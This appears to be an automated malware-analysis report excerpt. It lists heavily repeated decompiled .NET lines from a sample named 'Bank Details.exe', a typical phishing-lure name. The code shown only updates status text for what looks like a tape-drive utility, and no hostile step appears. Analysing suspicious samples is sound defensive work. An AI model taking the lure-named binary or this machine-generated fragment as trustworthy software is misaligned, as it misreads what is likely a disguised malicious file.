                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { ex3.ToString() + "\r\n" }, (string[])null, (Type[])null, (bool[])null, true);NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Format failed." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSetComplex(Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "RELEASE UNIT\r\n" }, (string[])null, (Type[])null);object textBox = TextBox8;object[] array3 = new object[1];object obj4;object obj5 = (obj4 = TapeUtils);object[] array4 = new object[1];byte[] array5 = (byte[])(array4[0] = Rx98Sr);object[] array6 = array4;bool[] obj6 = new bool[1] { true };bool[] array7 = obj6;object obj7 = NewLateBinding.LateGet(obj5, (Type)null, "ParseSenseData", array4, (string[])null, (Type[])null, obj6);if (array7[0]){Rx98Sr = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array6[0]), typeof(byte[]));}array3[0] = obj7;object[] array8 = array3;bool[] array9;NewLateBinding.LateCall(textBox, (Type)null, "AppendText", array3, (string[])null, (Type[])null, array9 = new bool[1] { true }, true);if (array9[0]){NewLateBinding.LateSetComplex(obj4, (Type)null, "ParseSenseData", new object[2]{array5,array8[0]}, (string[])null, (Type[])null, true, true);}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "ALLOW MEDIA REMOVAL\r\n" }, (string[])null, (Type[])null);object textBox = TextBox8;object[] array3 = new object[1];object obj4;object obj5 = (obj4 = TapeUtils);object[] array4 = new object[1];byte[] array5 = (byte[])(array4[0] = Ac36Xy);object[] array6 = array4;bool[] obj6 = new bool[1] { true };bool[] array7 = obj6;object obj7 = NewLateBinding.LateGet(obj5, (Type)null, "ParseSenseData", array4, (string[])null, (Type[])null, obj6);if (array7[0]){Ac36Xy = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array6[0]), typeof(byte[]));}array3[0] = obj7;object[] array8 = array3;bool[] array9;NewLateBinding.LateCall(textBox, (Type)null, "AppendText", array3, (string[])null, (Type[])null, array9 = new bool[1] { true }, true);if (array9[0]){NewLateBinding.LateSetComplex(obj4, (Type)null, "ParseSenseData", new object[2]{array5,array8[0]}, (string[])null, (Type[])null, true, true);}}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { "Filemark written." }, (string[])null, (Type[])null);NewLateBinding.LateSetComplex(CS_0024_003C_003E8__locals0._0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { $"Writing: {CS_0024_003C_003E8__locals0._0024VB_0024Local_fname}" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(CS_0024_003C_003E8__locals0._0024VB_0024Me.TextBox8, (Type)null, "Text", new object[1] { $"Write finished: {CS_0024_003C_003E8__locals0._0024VB_0024Local_fname}" }, (string[])null, (Type[])null);NewLateBinding.LateSetComplex(CS_0024_003C_003E8__locals0._0024VB_0024Me.Panel1, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null, false, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "DataBuffer\r\n" }, (string[])null, (Type[])null);object textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)k2(array2, d0: true)) }, (string[])null, (Type[])null);textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\n\r\nSenseBuffer\r\n") }, (string[])null, (Type[])null);textBox4 = TextBox8;NewLateBinding.LateSet(textBox4, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)(k2(array3) + "\r\n")) }, (string[])null, (Type[])null);textBox4 = TextBox8;object obj4 = textBox4;object[] array6 = new object[1];object obj5 = NewLateBinding.LateGet(textBox4, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null);object obj6 = TapeUtils;object[] obj7 = new object[1] { array3 };object[] array7 = obj7;bool[] obj8 = new bool[1] { true };bool[] array8 = obj8;object obj9 = NewLateBinding.LateGet(obj6, (Type)null, "ParseSenseData", obj7, (string[])null, (Type[])null, obj8);if (array8[0]){array3 = (byte[])Conversions.ChangeType(RuntimeHelpers.GetObjectValue(array7[0]), typeof(byte[]));}array6[0] = Operators.ConcatenateObject(obj5, Operators.ConcatenateObject(obj9, (object)"\r\n"));NewLateBinding.LateSet(obj4, (Type)null, "Text", array6, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{object textBox3 = TextBox8;NewLateBinding.LateSet(textBox3, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox3, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\nOK") }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{object textBox2 = TextBox8;NewLateBinding.LateSet(textBox2, (Type)null, "Text", new object[1] { Operators.ConcatenateObject(NewLateBinding.LateGet(textBox2, (Type)null, "Text", new object[0], (string[])null, (Type[])null, (bool[])null), (object)"\r\nFAIL") }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(NewLateBinding.LateGet(ComboBox2, (Type)null, "ComboBox2", new object[0], (string[])null, (Type[])null, (bool[])null), (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(Panel2, (Type)null, "Enabled", new object[1] { true }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateSet(TextBox8, (Type)null, "Text", new object[1] { "Start erase ...\r\n" }, (string[])null, (Type[])null);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Loading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SENSE" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals0._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { string.Format(" Mode Data: {0}{1}", k2(CS_0024_003C_003E8__locals0._0024VB_0024Local_ModeData), "\r\n") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "MODE SELECT - Partition mode page.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Partitioning.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unthreading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Threading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(CS_0024_003C_003E8__locals2._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.TextBox8, (Type)null, "AppendText", new object[1] { Operators.ConcatenateObject(Operators.ConcatenateObject((object)("Erasing " + Conversions.ToString(CS_0024_003C_003E8__locals2._0024VB_0024Local_i) + "/"), NewLateBinding.LateGet(CS_0024_003C_003E8__locals2._0024VB_0024NonLocal__0024VB_0024Closure_2._0024VB_0024Me.NumericUpDown6, (Type)null, "Value", new object[0], (string[])null, (Type[])null, (bool[])null)), (object)"..") }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unthreading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Threading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Reinitializing.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { "Unloading.." }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " OK\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
                      Source: Bank Details.exe, y8.cs.Net Code: NewLateBinding.LateCall(ComboBox2, (Type)null, "Invoke", new object[1] { (n8)([SpecialName] () =>{NewLateBinding.LateCall(TextBox8, (Type)null, "AppendText", new object[1] { " Fail\r\n" }, (string[])null, (Type[])null, (bool[])null, true);}) }, (string[])null, (Type[])null, (bool[])null, true)
